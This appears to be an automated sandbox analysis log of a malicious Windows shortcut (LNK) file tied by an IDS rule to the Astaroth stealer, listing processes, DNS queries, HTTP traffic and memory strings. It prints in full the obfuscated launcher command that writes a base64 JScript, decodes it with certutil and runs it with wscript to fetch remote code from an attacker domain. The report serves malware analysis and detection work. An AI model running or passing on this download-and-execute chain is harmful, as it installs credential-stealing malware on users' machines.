Source: unknown | HTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.4:49693 version: TLS 1.2 |
Source: C:\Windows\System32\wscript.exe | Domain query: a8eiy8.innovationsinsight.cyou |
Source: C:\Windows\System32\wscript.exe | Domain query: www.cloudflare.com |
Source: C:\Windows\System32\wscript.exe | Network Connect: 188.114.96.3 80 |
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.16.123.96 443 |
Source: Traffic | Snort IDS: 2851288 ETPRO TROJAN Astaroth Stealer Activity (GET) 192.168.2.4:49692 -> 188.114.96.3:80 |
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com |
Source: global traffic | HTTP traffic detected: GET /?3/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: a8eiy8.innovationsinsight.cyouConnection: Keep-Alive |
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS |
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49693 |
Source: unknown | Network traffic detected: HTTP traffic on port 49693 -> 443 |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Feb 2023 06:21:01 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSSet-Cookie: __cf_bm=NctGf338qS6Q8cshuHpQF7uH_MOJuTny5ADo4vU.xqk-1675232461-0-AW1Q7h5OMBuCvlggYK/BHKQyYSg3tgfvIRV9fHORHnQWMveDPLyaOdJTr2ypAAtGC4AQ5arCEIABAKODWktmY4Z2CurBlCA7OX1h8Nee2olT; path=/; expires=Wed, 01-Feb-23 06:51:01 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=NoneServer-Timing: cf-q-config;dur=4.9999998736894e-06Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uv4Cu%2FH5ZRDqWs91VT3dCsC%2BGWzlthG4vMasGJWkt%2FsaHORTre%2BFtRjecD8DDQyi73ORgxl9At0bvivDoskcD6jynlgVCR8YlFvxCZXi6MR5WVHS423b2XGhqKRGnmUdjuCtYQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGnj5V9pFxnTHRN; SameSite=None; Secure; path=/; expires=Thu, 02-Feb-23 05:21:01 GMT; HttpOnlyServer: cloudflareCF-RAY: 792895a4c8f030db-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 |
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: hTtP://a8eiy8.innovationsinsight.cyou/?3/ |
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: hTtP://a8eiy8.innovationsinsight.cyou/?3/l |
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://a8eiy8.innovationsinsight.cyou/ |
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://a8eiy8.innovationsinsight.cyou/?3/ |
Source: wscript.exe, 00000003.00000003.304983950.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311600820.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.310925472.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com |
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/ |
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error |
Source: wscript.exe, 00000003.00000003.304983950.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorT |
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errore.com/ |
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorfM |
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/g |
Source: unknown | DNS traffic detected: queries for: a8eiy8.innovationsinsight.cyou |
Source: C:\Windows\System32\certutil.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\YDgC5P9\>nul 2>&1 &&s^eT XEHH=C:\YDgC5P9\^YDgC5P9.^jS&&echo dmFyIEM0NXQ9InNjIisiciI7RDQ1dD0iaXAiKyJ0OmgiO0U0NXQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDNDV0K0Q0NXQrRTQ1dCsiLy9hOGVpeTguaW5ub3ZhdGlvbnNpbnNpZ2h0LmN5b3UvPzMvIik7>!XEHH!&&cErtUtil -f -dEco^de !XEHH! !XEHH!&&ca^ll !XEHH! |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\YDgC5P9\YDgC5P9.jS C:\YDgC5P9\YDgC5P9.jS |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\YDgC5P9\YDgC5P9.jS" |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 |
Source: classification engine | Classification label: mal68.evad.winLNK@6/1@2/2 |
Source: C:\Windows\System32\cmd.exe | File read: C:\Users\user\Desktop\desktop.ini |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: LNK file | Process created: C:\Windows\System32\cmd.exe |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer |
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.310977085.000001D5B8D11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8D11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8D11000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW |
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |